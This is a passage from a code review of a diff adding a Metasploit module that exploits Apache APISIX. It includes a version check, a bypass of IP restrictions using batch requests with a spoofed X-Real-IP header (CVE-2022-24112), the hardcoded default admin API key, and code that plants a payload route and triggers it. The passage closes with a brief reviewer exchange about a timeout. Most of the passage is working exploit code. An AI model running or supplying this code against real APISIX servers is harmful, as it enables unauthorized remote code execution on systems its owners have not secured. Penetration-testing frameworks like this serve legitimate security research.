modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb

```diff
@@ -0,0 +1,226 @@
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the APISIX DocumentRoot', '/apisix']),
+      OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1']),
+      OptString.new('ALLOWED_IP', [true, 'IP in the allowed list', '127.0.0.1'])
+    ])
+  end
+
+  def check
+    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    # perform an unautheticated request to a random path
+    res = send_request_cgi({
+      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(6)), # random path
+      'method' => 'GET'
+    })
+
+    unless res && res.headers.key?('Server')
+      return Exploit::CheckCode::Safe('Seems not a APISIX server')
+    end
+
+    res.headers['Server'].match(%r{APISIX/(.*)$})
+    version = Rex::Version.new(Regexp.last_match(1))
+    vprint_status("Found an APISIX #{version}")
+    unless version > Rex::Version.new('2')
+      return Exploit::CheckCode::Safe('This version has not the script feature')
+    end
+
+    vprint_good('This version has the script feature')
+    return Exploit::CheckCode::Appears('There is direct access to the routes using the provided token') if direct_access?
+
+    vprint_status('There is no direct access to the routes. Trying to bypass restriction')
+    pipeline = [
+      {
+        method: 'GET',
+        path: "#{target_uri.path}/admin/routes"
+      }
+    ]
+    res = batch_request(batch_body(pipeline))
+    if res && res.code == 200
+      return Exploit::CheckCode::Appears('Can bypass restriction using batch request')
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    if direct_access?
+      add_route
+    else
+      vprint_status 'Trying to bypass restriction'
+      payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
+      add_route_batch(payload_uri)
+      # trigger the payload
+      apisix_request({
+        'uri' => normalize_uri(payload_uri),
+        'method' => 'GET'
+      })
+    end
+    handler
+    clean_up(payload_uri) if payload_uri
+  end
+
+  # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
+  def batch_request(data = nil)
+    params = {
+      'uri' => normalize_uri(target_uri.path.to_s + '/batch-requests'),
+      'method' => 'POST'
+    }
+    params.merge!({ 'data' => data }) if data
+
+    apisix_request(params)
+  end
+
+  def batch_body(pipeline = [])
+    headers = {
+      'X-Real-IP': datastore['ALLOWED_IP'].to_s,
+      'X-API-KEY' => datastore['API_KEY'].to_s,
+      'Content-Type': 'application/json'
+    }
+
+    {
+      headers: headers,
+      timeout: 1500,
```

Comment:
Does this need to be user configurable? It's not clear what this timeout is for and if it's seconds or milliseconds?

Reply:
It means the amount of time you want to wait until receive an answer from your HTTP [pipeline](https://en.wikipedia.org/wiki/HTTP_pipelining) request and it is optional however the default value is 3000 ms [batch-request doc](https://apisix.apache.org/docs/apisix/plugins/batch-requests/). Not sure if should make it configurable.